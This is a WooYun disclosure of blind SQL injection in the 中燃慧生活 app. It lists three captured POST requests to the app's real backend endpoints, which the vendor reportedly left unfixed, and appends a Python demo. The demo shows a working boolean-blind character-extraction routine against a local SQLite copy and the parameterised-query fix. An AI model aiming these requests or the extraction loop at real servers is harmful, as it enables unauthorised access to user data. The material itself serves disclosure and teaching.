WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online --------------------------- http://drop.zone.ci/
2016-02-16: Details reported to the vendor; awaiting vendor handling.
2016-02-22: The vendor proactively ignored the vulnerability; details disclosed to the public.
App Security: SQL Injection
Target: the 中燃慧生活 app. Testing found that each of the following places is vulnerable to SQL injection:
1. POST parameter name: boolean-based blind / time-based blind
POST http://zrds.zrhsh.cn/ZRapp/getLocationArea HTTP/1.1
appverify: md5=7dc0db6536961498031d430d92134755;ts=1455599646992
Charset: UTF-8
User-Agent: Mozilla/5.0 (Linux; U; Mobile; Android 4.4.2;X9180 Build/FRF91 )
Accept: */*
x-mas-app-info: aaahg10001/public
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Content-Length: 32
Content-Type: application/x-www-form-urlencoded
Host: zrds.zrhsh.cn

name=上海市
2. POST parameter productId: boolean-based blind / time-based blind
POST http://zrds.zrhsh.cn/ZRapp/getSTProductDetail HTTP/1.1
Cookie: test=57838640
appverify: md5=2252283658cc3b9fdc38c79ace09e82c;ts=1455602656607
Charset: UTF-8
User-Agent: Mozilla/5.0 (Linux; U; Mobile; Android 4.4.2;X9180 Build/FRF91 )
Accept: */*
x-mas-app-info: aaahg10001/public
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Content-Length: 33
Content-Type: application/x-www-form-urlencoded
Host: zrds.zrhsh.cn

rootCategoryId=270&productId=8161
3. POST parameter attr: boolean-based blind / time-based blind (the request line of this capture is missing from the report; only the headers and body survive)
Cookie: test=57838640
appverify: md5=561eb720f521916478f5f7b3c138c776;ts=1455599647480
Charset: UTF-8
User-Agent: Mozilla/5.0 (Linux; U; Mobile; Android 4.4.2;X9180 Build/FRF91 )
Accept: */*
x-mas-app-info: aaahg10001/public
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Content-Length: 5
Content-Type: application/x-www-form-urlencoded
Host: zrds.zrhsh.cn

attr=
Proof of concept:
1. SQLMap confirmation of the injection
2. Dumped the current database user
3. Dumped the current database name
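The three findings above share one bug class: a POST value is concatenated into the SQL text, and the only feedback the attacker gets is whether the response changes (boolean-based blind) or how long it takes (time-based blind). The following is an added example, not code from the report or from the vendor's app. It models the getLocationArea endpoint's name parameter against an in-memory SQLite database (the report does not name the real DBMS, and the table names, columns, rows and the `users` table are all constructed for the demo), shows the vulnerable query beside its parameterised fix, and drives a boolean-blind oracle to recover the current database user character by character, which is what "dumped the current database user" in the proof section amounts to. The appverify request signature seen in the captures is not modelled.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the app backend. Tables, columns and rows are
    # assumptions for the demo, not taken from the report.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE area (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO area VALUES (?, ?)",
                     [(1, "上海市"), (2, "北京市"), (3, "广州市")])
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'zrapp')")
    return conn


def get_location_area_vulnerable(conn, name):
    # The bug class in the report: the POST value lands inside the SQL text.
    sql = "SELECT id, name FROM area WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def get_location_area_fixed(conn, name):
    # Parameterised query: the value is bound by the driver, never parsed as SQL.
    return conn.execute("SELECT id, name FROM area WHERE name = ?",
                        (name,)).fetchall()


def boolean_oracle(query_fn, conn, name, condition):
    """True when the injected condition keeps the matching row in the result.

    This is the boolean-blind primitive: the response differs (row vs. no row)
    depending on whether `condition` is true. A time-based variant runs the same
    loop but measures a delay (e.g. MySQL SLEEP()) instead of a content change.
    """
    payload = f"{name}' AND ({condition})--"
    return len(query_fn(conn, payload)) > 0


def extract_string(query_fn, conn, name, subquery, max_len=64):
    """Recover the result of `subquery` one character at a time, using only the
    true/false oracle and a binary search over the character's code point."""
    out = ""
    for pos in range(1, max_len + 1):
        # Stop once the string is shorter than the position being probed.
        if not boolean_oracle(query_fn, conn, name,
                              f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 0, 0x10FFFF
        while lo < hi:
            mid = (lo + hi) // 2
            # unicode(substr(x, pos, 1)) is the code point of character `pos`.
            if boolean_oracle(query_fn, conn, name,
                              f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print(get_location_area_vulnerable(db, "上海市' AND (1=1)--"))  # one row
    print(get_location_area_vulnerable(db, "上海市' AND (1=2)--"))  # no rows
    print(extract_string(get_location_area_vulnerable, db, "上海市",
                         "SELECT username FROM users LIMIT 1"))
    # Against the fixed handler the quote is just data: no row, no oracle.
    print(get_location_area_fixed(db, "上海市' AND (1=1)--"))
```

The fix is the bound parameter in get_location_area_fixed, not input filtering: with the value bound, the oracle never fires, so extract_string returns an empty string against the fixed handler. The same binary-search loop is what sqlmap runs, with many more requests, when it reports "boolean-based blind" for a parameter.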
Any advice is welcome~
Severity: No impact (vendor ignored)
Ignored on: 2016-02-22 09:00
Vulnerability Rank: 4 (WooYun rating)
None yet